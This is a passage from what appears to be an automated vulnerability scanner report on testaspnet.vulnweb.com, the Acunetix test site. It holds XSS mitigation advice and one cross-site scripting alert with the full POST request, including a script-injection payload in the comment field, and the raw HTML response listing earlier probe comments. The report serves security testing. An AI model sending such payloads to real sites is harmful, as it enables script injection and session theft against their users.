          Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

          For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

          Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.

          Phase: Architecture and Design

          For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

          If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

          Phase: Implementation

          For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.

          To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

          Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

          When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

          Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.

        2. POST http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Alert tags
          Alert description

          Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.

          When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.

          There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.

          Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.

          Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Content-Length: 1784
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1784 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kZLQBJ3hOt3r5jKtYjVFFKdowCSWC&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKpxZClDQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2Fpbihq93nLJJrCcGURk6iWNCIK%2BA%3D%3D&tbComment=%3C%2Fdiv%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E%3Cdiv%3E&btnSend=Send+comment
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:07:15 GMT
          Content-Length: 34006
          
          
          Response body (34006 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFgoCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kAgkPZBYCAgEPZBbwAWYPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIBD2QWAmYPFgIeBWNsYXNzBQdDb21tZW50ZAICD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAIDD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCBA9kFgJmDxYCHwMFB0NvbW1lbnRkAgUPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAgYPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIH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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQLRtujbBQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q85f/uFteDjFkg90BqRgVgUmoU17A==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a>
          						<DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:36 PM</DIV><DIV class="CommentText">3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">http://3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">https://3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">http:\\3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">https:\\3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">//3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
